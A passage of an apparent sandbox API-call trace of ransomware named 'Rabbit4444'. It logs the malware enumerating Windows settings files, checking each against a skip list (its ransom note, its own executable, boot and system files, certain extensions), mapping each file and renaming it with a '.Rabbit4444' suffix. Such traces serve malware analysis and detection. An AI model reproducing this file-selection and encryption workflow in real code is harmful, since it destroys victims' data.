"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synclanguage_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synclanguage_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.072] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b944912, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b944912, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", cAlternateFileName="AA6322~1.SET")) returned 1 [0058.072] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.072] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.072] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.073] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.073] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms" [0058.073] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.073] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms") returned 67 [0058.073] lstrlenW (lpString="Rabbit4444") returned 10 [0058.073] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.073] lstrlenW (lpString=".dll") returned 4 [0058.073] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.073] lstrlenW (lpString=".lnk") returned 4 [0058.073] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.073] lstrlenW (lpString=".ini") returned 4 [0058.073] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.073] lstrlenW (lpString=".sys") returned 4 [0058.073] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.073] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncmaster_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.074] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.074] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14938441543) returned 1 [0058.074] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1293) returned 1 [0058.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0058.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0058.074] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0058.075] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0058.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.076] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14938713172) returned 1 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0058.076] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0058.076] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.077] CloseHandle (hObject=0x298) returned 1 [0058.077] CloseHandle (hObject=0x278) returned 1 [0058.077] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms.Rabbit4444") returned 195 [0058.077] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncmaster_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncmaster_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.078] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb4bbb2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3bb4bbb2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x535, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", cAlternateFileName="AA0713~1.SET")) returned 1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.078] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.078] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms" [0058.078] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.078] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms") returned 76 [0058.078] lstrlenW (lpString="Rabbit4444") returned 10 [0058.078] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.078] lstrlenW (lpString=".dll") returned 4 [0058.078] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.078] lstrlenW (lpString=".lnk") returned 4 [0058.078] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.078] lstrlenW (lpString=".ini") returned 4 [0058.078] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.079] lstrlenW (lpString=".sys") returned 4 [0058.079] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.079] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncpersonalization_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.079] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.079] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14938971259) returned 1 [0058.079] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1333) returned 1 [0058.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0058.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0058.079] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0058.081] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0058.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.082] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14939280248) returned 1 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0058.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0058.082] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.082] CloseHandle (hObject=0x298) returned 1 [0058.082] CloseHandle (hObject=0x278) returned 1 [0058.082] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms.Rabbit4444") returned 204 [0058.082] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncpersonalization_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncpersonalization_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc937f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3bcc937f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", cAlternateFileName="AA022F~1.SET")) returned 1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.083] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.083] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms" [0058.084] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.084] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms") returned 64 [0058.084] lstrlenW (lpString="Rabbit4444") returned 10 [0058.084] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.084] lstrlenW (lpString=".dll") returned 4 [0058.084] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.084] lstrlenW (lpString=".lnk") returned 4 [0058.084] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.084] lstrlenW (lpString=".ini") returned 4 [0058.084] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.084] lstrlenW (lpString=".sys") returned 4 [0058.084] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_windows_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.084] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.084] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14939514108) returned 1 [0058.084] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1273) returned 1 [0058.084] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0058.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.085] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.087] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.088] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14939914199) returned 1 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0058.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.089] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.089] CloseHandle (hObject=0x298) returned 1 [0058.089] CloseHandle (hObject=0x278) returned 1 [0058.089] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms.Rabbit4444") returned 192 [0058.089] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_windows_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_windows_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.089] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bdfa659, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3bdfa659, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", cAlternateFileName="AA4883~1.SET")) returned 1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2=".") returned 1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="..") returned 1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="windows") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="boot") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.090] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.090] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms") returned="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms" [0058.090] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.090] lstrlenW (lpString="AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms") returned 62 [0058.090] lstrlenW (lpString="Rabbit4444") returned 10 [0058.090] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.090] lstrlenW (lpString=".dll") returned 4 [0058.090] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.090] lstrlenW (lpString=".lnk") returned 4 [0058.090] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.090] lstrlenW (lpString=".ini") returned 4 [0058.090] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.090] lstrlenW (lpString=".sys") returned 4 [0058.090] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.090] CreateFileW 